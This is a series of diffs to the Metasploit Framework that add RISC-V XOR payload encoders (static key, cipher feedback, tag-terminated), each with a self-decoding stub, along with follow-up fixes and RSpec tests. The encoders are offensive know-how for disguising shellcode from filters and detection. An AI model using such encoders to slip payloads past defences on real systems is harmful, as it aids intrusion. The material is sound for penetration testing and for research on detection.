+    return false unless super
+
+    key = key_bytes_to_integer(key_bytes)
+    find_xori_imm(key, badchars)
+    true
+  rescue EncodingError
+    false
+  end
+
+  private
+
+  # Find a 12-bit immediate for the xori instruction that avoids bad characters
+  # in its encoding. Only the low 8 bits affect the XOR result since sb stores
+  # only the low byte, so bits [11:8] can be set freely.
+  def find_xori_imm(key, badchars)
+    # Try upper nibbles 1-15 first (avoids null byte in instruction word)
+    (1..15).each do |hi|
+      imm12 = (hi << 8) | (key & 0xFF)
+      bytes = [encode_xori_insn(28, 28, imm12)].pack('V')
+      return imm12 if Rex::Text.badchar_index(bytes, badchars).nil?
+    end
+    # Fallback: try with no upper bits
+    imm12 = key & 0xFF
+    bytes = [encode_xori_insn(28, 28, imm12)].pack('V')
+    return imm12 if Rex::Text.badchar_index(bytes, badchars).nil?
+
+    raise EncodingError, "The #{name} encoder failed to avoid bad characters in the xori instruction"
+  end
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LBU rd, imm12(rs1)
+  def encode_lbu(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SB rs2, imm12(rs1)
+  def encode_sb(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # I-type: XORI rd, rs1, imm12
+  def encode_xori_insn(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0010011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv64le/longxor.rb
+++ b/modules/encoders/riscv64le/longxor.rb
@@ -1,0 +1,128 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'XOR Encoder',
+      'Description' => %q{
+        Dword XOR encoder for RISC-V 64-bit (Little Endian). Encodes the
+        payload with a 4-byte XOR key.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV64LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+
+    block_count = state.buf.length / 4
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if block_count > 2047
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # Decoder stub layout (72 bytes = 17 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 72        # t4 = start of encoded payload
+    #   0x08: lw     t1, 68(t0)        # t1 = XOR key (stored at end of stub)
+    #   0x0c: addi   t2, x0, count     # t2 = number of dwords to decode
+    #   0x10: addi   t0, t4, 0         # t0 = working pointer
+    #   0x14: lw     t3, 0(t0)         # load encoded dword
+    #   0x18: xor    t3, t3, t1        # XOR with key
+    #   0x1c: sw     t3, 0(t0)         # store decoded dword
+    #   0x20: addi   t0, t0, 4         # advance pointer
+    #   0x24: addi   t2, t2, -1        # decrement counter
+    #   0x28: bne    t2, x0, -0x14     # loop to 0x14
+    #   0x2c: addi   a0, t4, 0         # cache flush start address
+    #   0x30: addi   a1, t0, 0         # cache flush end address
+    #   0x34: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x38: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x3c: ecall                    # flush icache
+    #   0x40: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x44: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_addi(29, 5, 72),         # addi   t4, t0, 72
+      encode_lw(6, 5, 68),            # lw     t1, 68(t0)
+      encode_addi(7, 0, block_count), # addi   t2, x0, count
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(28, 5, 0),            # lw     t3, 0(t0)
+      encode_xor(28, 28, 6),          # xor    t3, t3, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_addi(7, 7, -1),          # addi   t2, t2, -1
+      encode_bne(7, 0, -20),          # bne    t2, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv64le/longxor.rb
+++ b/modules/encoders/riscv64le/longxor.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   private

--- a/modules/encoders/riscv64le/longxor_feedback.rb
+++ b/modules/encoders/riscv64le/longxor_feedback.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   #
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Encoder::Xor
     feedback = key_bytes_to_integer(key_bytes)
 
     buf.bytes.each_slice(4) do |bytes|
-      block = bytes.pack('C*').ljust(4, "\x00")
+      block = bytes.pack('C*').ljust(4, "\x00".b)
       encoded_val = block.unpack1('V') ^ feedback
       return false unless has_badchars?([encoded_val].pack('V'), badchars).nil?
 

--- a/modules/encoders/riscv64le/longxor_feedback.rb
+++ b/modules/encoders/riscv64le/longxor_feedback.rb
@@ -1,0 +1,171 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'XOR Encoder with Cipher Feedback',
+      'Description' => %q{
+        Dword XOR encoder with cipher feedback for RISC-V 64-bit
+        (Little Endian). Each dword is XORed with the previous encoded
+        dword rather than a static key, creating a chained dependency
+        that makes the output more resistant to frequency analysis. The
+        first dword is XORed with the key to bootstrap the chain.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV64LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+
+    block_count = state.buf.length / 4
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if block_count > 2047
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # Decoder stub layout (76 bytes = 18 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 76        # t4 = start of encoded payload
+    #   0x08: lw     t1, 72(t0)        # t1 = feedback value (initially the key)
+    #   0x0c: addi   t2, x0, count     # t2 = number of dwords to decode
+    #   0x10: addi   t0, t4, 0         # t0 = working pointer
+    #   0x14: lw     t5, 0(t0)         # load encoded dword into t5
+    #   0x18: xor    t3, t5, t1        # decoded = encoded XOR feedback
+    #   0x1c: sw     t3, 0(t0)         # store decoded dword
+    #   0x20: addi   t1, t5, 0         # feedback = previous encoded dword
+    #   0x24: addi   t0, t0, 4         # advance pointer
+    #   0x28: addi   t2, t2, -1        # decrement counter
+    #   0x2c: bne    t2, x0, -0x18     # loop to 0x14
+    #   0x30: addi   a0, t4, 0         # cache flush start address
+    #   0x34: addi   a1, t0, 0         # cache flush end address
+    #   0x38: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x3c: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x40: ecall                    # flush icache
+    #   0x44: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x48: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_addi(29, 5, 76),         # addi   t4, t0, 76
+      encode_lw(6, 5, 72),            # lw     t1, 72(t0)
+      encode_addi(7, 0, block_count), # addi   t2, x0, count
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(30, 5, 0),            # lw     t5, 0(t0)
+      encode_xor(28, 30, 6),          # xor    t3, t5, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(6, 30, 0),          # addi   t1, t5, 0
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_addi(7, 7, -1),          # addi   t2, t2, -1
+      encode_bne(7, 0, -24),          # bne    t2, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  #
+  # Initialize the feedback value prior to encoding.
+  #
+  def encode_begin(state)
+    @feedback = state.key.to_i
+  end
+
+  #
+  # Encode a block using XOR with cipher feedback. Each encoded
+  # dword becomes the XOR operand for the next block.
+  #
+  def encode_block(_state, block)
+    encoded_val = block.unpack1('V') ^ @feedback
+    @feedback = encoded_val
+    [encoded_val].pack('V')
+  end
+
+  #
+  # Verify that a candidate key remains valid once cipher feedback
+  # encoding has been applied across the full buffer.
+  #
+  def find_key_verify(buf, key_bytes, badchars)
+    return false unless super
+    return true if badchars.to_s.empty?
+
+    feedback = key_bytes_to_integer(key_bytes)
+
+    buf.bytes.each_slice(4) do |bytes|
+      block = bytes.pack('C*').ljust(4, "\x00")
+      encoded_val = block.unpack1('V') ^ feedback
+      return false unless has_badchars?([encoded_val].pack('V'), badchars).nil?
+
+      feedback = encoded_val
+    end
+
+    true
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv64le/longxor_tag.rb
+++ b/modules/encoders/riscv64le/longxor_tag.rb
@@ -1,0 +1,145 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = LowRanking
+
+  def initialize
+    super(
+      'Name' => 'Dword XOR Encoder (Tag-based)',
+      'Description' => %q{
+        Dword XOR encoder for RISC-V 64-bit (Little Endian) using a
+        tag-based terminator rather than an encoded length. The decoder
+        loop XORs each dword and stops when the result is zero (the
+        sentinel). This avoids encoding the payload length in the stub,
+        eliminating a source of bad character conflicts.
+
+        Note: payloads containing 4-byte aligned zero dwords will cause
+        early loop termination due to collision with the sentinel value.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV64LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # The sentinel-based loop terminates when a decoded dword is zero.
+    # A zero dword in the raw payload will always decode to zero regardless
+    # of the key, causing early termination. Detect this upfront.
+    state.buf.scan(/.{4}/m).each_with_index do |block, idx|
+      if block.unpack1('V') == 0
+        raise EncodingError, "Payload contains a zero dword at offset #{idx * 4}; use riscv64le/longxor instead"
+      end
+    end
+
+    # Decoder stub layout (64 bytes = 15 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: lw     t1, 60(t0)        # t1 = XOR key (stored at end of stub)
+    #   0x08: addi   t4, t0, 64        # t4 = start of encoded payload
+    #   0x0c: addi   t0, t4, 0         # t0 = working pointer
+    #   0x10: lw     t3, 0(t0)         # load encoded dword
+    #   0x14: xor    t3, t3, t1        # XOR with key
+    #   0x18: sw     t3, 0(t0)         # store decoded dword
+    #   0x1c: addi   t0, t0, 4         # advance pointer
+    #   0x20: bne    t3, x0, -0x10     # loop to 0x10 if non-zero (sentinel = 0)
+    #   0x24: addi   a0, t4, 0         # cache flush start address
+    #   0x28: addi   a1, t0, 0         # cache flush end address
+    #   0x2c: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x30: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x34: ecall                    # flush icache
+    #   0x38: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x3c: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_lw(6, 5, 60),            # lw     t1, 60(t0)
+      encode_addi(29, 5, 64),         # addi   t4, t0, 64
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(28, 5, 0),            # lw     t3, 0(t0)
+      encode_xor(28, 28, 6),          # xor    t3, t3, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_bne(28, 0, -16),         # bne    t3, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  #
+  # Append the XOR key as a sentinel after the encoded payload.
+  # When the decoder XORs this with the key, the result is zero,
+  # terminating the decode loop.
+  #
+  def encode_end(state)
+    state.encoded += [state.key.to_i].pack('V')
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv64le/longxor_tag.rb
+++ b/modules/encoders/riscv64le/longxor_tag.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   #

--- a/spec/modules/encoders/riscv32le/byte_xori_spec.rb
+++ b/spec/modules/encoders/riscv32le/byte_xori_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv32le/byte_xori' do
+  it_behaves_like 'riscv byte_xori encoder', 'riscv32le/byte_xori'
+end

--- a/spec/modules/encoders/riscv32le/longxor_feedback_spec.rb
+++ b/spec/modules/encoders/riscv32le/longxor_feedback_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv32le/longxor_feedback' do
+  it_behaves_like 'riscv longxor_feedback encoder', 'riscv32le/longxor_feedback'
+end

--- a/spec/modules/encoders/riscv32le/longxor_spec.rb
+++ b/spec/modules/encoders/riscv32le/longxor_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv32le/longxor' do
+  it_behaves_like 'riscv longxor encoder', 'riscv32le/longxor'
+end

--- a/spec/modules/encoders/riscv32le/longxor_tag_spec.rb
+++ b/spec/modules/encoders/riscv32le/longxor_tag_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv32le/longxor_tag' do
+  it_behaves_like 'riscv longxor_tag encoder', 'riscv32le/longxor_tag'
+end

--- a/spec/modules/encoders/riscv64le/byte_xori_spec.rb
+++ b/spec/modules/encoders/riscv64le/byte_xori_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv64le/byte_xori' do
+  it_behaves_like 'riscv byte_xori encoder', 'riscv64le/byte_xori'
+end

--- a/spec/modules/encoders/riscv64le/longxor_feedback_spec.rb
+++ b/spec/modules/encoders/riscv64le/longxor_feedback_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv64le/longxor_feedback' do
+  it_behaves_like 'riscv longxor_feedback encoder', 'riscv64le/longxor_feedback'
+end

--- a/spec/modules/encoders/riscv64le/longxor_spec.rb
+++ b/spec/modules/encoders/riscv64le/longxor_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv64le/longxor' do
+  it_behaves_like 'riscv longxor encoder', 'riscv64le/longxor'
+end

--- a/spec/modules/encoders/riscv64le/longxor_tag_spec.rb
+++ b/spec/modules/encoders/riscv64le/longxor_tag_spec.rb
@@ -1,0 +1,6 @@
+require 'spec_helper'
+require_relative '../riscv_xor_encoder_examples'
+
+RSpec.describe 'modules/encoders/riscv64le/longxor_tag' do
+  it_behaves_like 'riscv longxor_tag encoder', 'riscv64le/longxor_tag'
+end

--- a/spec/modules/encoders/riscv_xor_encoder_examples.rb
+++ b/spec/modules/encoders/riscv_xor_encoder_examples.rb
@@ -1,6 +1,8 @@
 # Shared examples for RISC-V XOR encoder modules.
 # Each shared example group accepts the encoder reference name as a parameter.
 
+require 'msf/core/encoder' # defines Msf::EncoderState, which make_encoder_state uses directly
+
 def make_encoder_state(buf, badchars = ''.b, key = 0xdeadbeef)
   state = Msf::EncoderState.new(key)
   state.buf = buf

--- a/spec/modules/encoders/riscv_xor_encoder_examples.rb
+++ b/spec/modules/encoders/riscv_xor_encoder_examples.rb
@@ -18,21 +18,21 @@ RSpec.shared_examples 'riscv byte_xori encoder' do |ref_name|
     context 'when badchars include a null byte' do
       it 'raises EncodingError' do
         state = make_encoder_state(valid_payload, "\x00".b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is empty' do
       it 'raises EncodingError' do
         state = make_encoder_state(''.b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload exceeds 2047 bytes' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 2048).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
@@ -56,23 +56,19 @@ RSpec.shared_examples 'riscv byte_xori encoder' do |ref_name|
         expected_jalr = (29 << 15) | 0b1100111
         expect(stub[-4, 4].unpack1('V')).to eq(expected_jalr)
       end
-
-      it 'contains no null bytes in the first instruction' do
-        expect(stub[0, 4]).not_to include("\x00".b)
-      end
     end
   end
 
   describe '#find_key_verify' do
     it 'accepts a key that produces valid xori encoding' do
-      key_bytes = [0x01].pack('C')
+      key_bytes = [0x01]
       result = encoder.find_key_verify(valid_payload, key_bytes, ''.b)
       expect(result).to be(true).or be(false)
     end
 
     it 'rejects a key whose xori instruction encoding hits a bad character' do
       bad_byte = "\x13".b
-      key_bytes = [0x00].pack('C')
+      key_bytes = [0x00]
       # Force a state where 0x13 is a badchar — the addi/xori opcodes end in 0x13
       result = encoder.find_key_verify(valid_payload, key_bytes, bad_byte)
       expect(result).to be(false)
@@ -92,28 +88,28 @@ RSpec.shared_examples 'riscv longxor encoder' do |ref_name|
     context 'when badchars include a null byte' do
       it 'raises EncodingError' do
         state = make_encoder_state(valid_payload, "\x00".b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is empty' do
       it 'raises EncodingError' do
         state = make_encoder_state(''.b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is not 4-byte aligned' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 5).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload exceeds 2047 dwords' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 4 * 2048).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
@@ -158,21 +154,21 @@ RSpec.shared_examples 'riscv longxor_tag encoder' do |ref_name|
     context 'when badchars include a null byte' do
       it 'raises EncodingError' do
         state = make_encoder_state(valid_payload, "\x00".b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is empty' do
       it 'raises EncodingError' do
         state = make_encoder_state(''.b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
     context 'when payload is not 4-byte aligned' do
       it 'raises EncodingError' do
         state = make_encoder_state(('A' * 5).b)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError)
       end
     end
 
@@ -180,7 +176,7 @@ RSpec.shared_examples 'riscv longxor_tag encoder' do |ref_name|
       it 'raises EncodingError' do
         payload_with_zero = ("\xde\xad\xbe\xef" + "\x00\x00\x00\x00" + "\xde\xad\xbe\xef" * 2).b
         state = make_encoder_state(payload_with_zero)
-        expect { encoder.decoder_stub(state) }.to raise_error(EncodingError, /zero dword/)
+        expect { encoder.decoder_stub(state) }.to raise_error(Msf::EncodingError, /zero dword/)
       end
     end
 
@@ -244,28 +240,28 @@ RSpec.shared_examples 'riscv longxor_feedback encoder' do |ref_name|
     context 'when badchars include a null byte' do
       it 'raises EncodingError' do
         state = make_encoder_state(valid_payload, "\x00".b)
